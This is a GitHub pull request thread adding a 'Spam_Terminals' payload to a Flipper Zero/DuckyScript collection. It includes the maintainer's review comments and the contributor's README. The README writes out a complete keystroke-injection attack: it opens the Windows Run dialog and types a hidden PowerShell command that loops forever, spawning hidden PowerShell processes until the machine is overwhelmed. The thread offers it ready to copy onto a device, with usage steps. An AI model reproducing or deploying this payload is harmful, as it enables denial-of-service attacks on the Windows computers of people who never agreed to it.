### PR TITLE
Create Spam_Terminals

### PR DESCRIPTION
**Pull request by brunoooost**

### CODE REVIEW

**Comment by aleff-github** [comment]
Before accepting your payload, I would like to suggest a few improvements:

1.	Please add a README file that provides a technical explanation of what your payload does. You can refer to the README of [NexusWannaBe](https://github.com/aleff-github/my-flipper-shits/blob/main/Windows/Execution/Shutdown_After_1_Minute-By_NexusWannaBe/README.md) for guidance.

2.	Add a brief delay at the start of the program. When the `GUI r` command is executed, the operating system needs some time to process the device. To ensure proper execution, it’s recommended to introduce a short delay (even 1 or 2 seconds but however it depends) before proceeding with the actual execution.

3.	When executing a `STRING` command, it must complete 100% before proceeding. Therefore, adding a delay between the `STRING` command and the `ENTER` key might be unnecessary, unless you’ve encountered race conditions during testing where the device seems to prematurely consider the input complete. If that’s the case, it would be interesting to discuss and understand why this happens.

I haven’t had a chance to test your payload yet, but once I do, I’ll be happy to add it to the payload list.

Looking forward to your updates,
Aleff

**Comment by brunoooost** [comment]
all done ;) here, [repository.txt] (https://github.com/brunoooost/SpamTerminalsWin-FlipZero/tree/main)

**Comment by brunoooost** [comment]
Hey, i just created all you ask.

**Comment by aleff-github** [comment]
> all done ;) here, [repository.txt] (https://github.com/brunoooost/SpamTerminalsWin-FlipZero/tree/main)

The link is broken, however you can upload yourself the readme file into the branch as you edited the file into this commit https://github.com/aleff-github/my-flipper-shits/pull/19/commits/cc2dbfb7cd09964a5e6f5222c0b735d87af5e9e1

**Comment by brunoooost** [comment]
okey ;)

**Review by brunoooost — COMMENTED** [review]
# SpamTerminals-FlipZero

## Description

This script, created by bst04, is designed to work on Windows devices. It opens an infinite number of hidden PowerShell terminals, effectively spamming the system with terminal instances.


## Technical Explanation

1. **Initialization**:
    - `GUI r`: Simulates pressing "Windows" + "R" to open the Run dialog.
    - `DELAY 250`: Waits for 0.25 seconds to ensure the Run dialog is open.

2. **Execute PowerShell Command**:
    - `STRING powershell -WindowStyle Hidden -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -WindowStyle Hidden -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -WindowStyle Hidden\"' }"`: Types a PowerShell command that runs an infinite loop, continuously opening hidden PowerShell windows.
    - `DELAY 1000`: Waits for 1 second to ensure the command is fully typed.

3. **Start the Command**:
    - `ENTER`: Executes the PowerShell command.

---

## Usage

1. Copy the payload script to your DuckyScript-enabled device.
2. Ensure the device is connected to a Windows system.
3. Execute the payload to open an infinite number of hidden PowerShell terminals.

**Pull request merged**
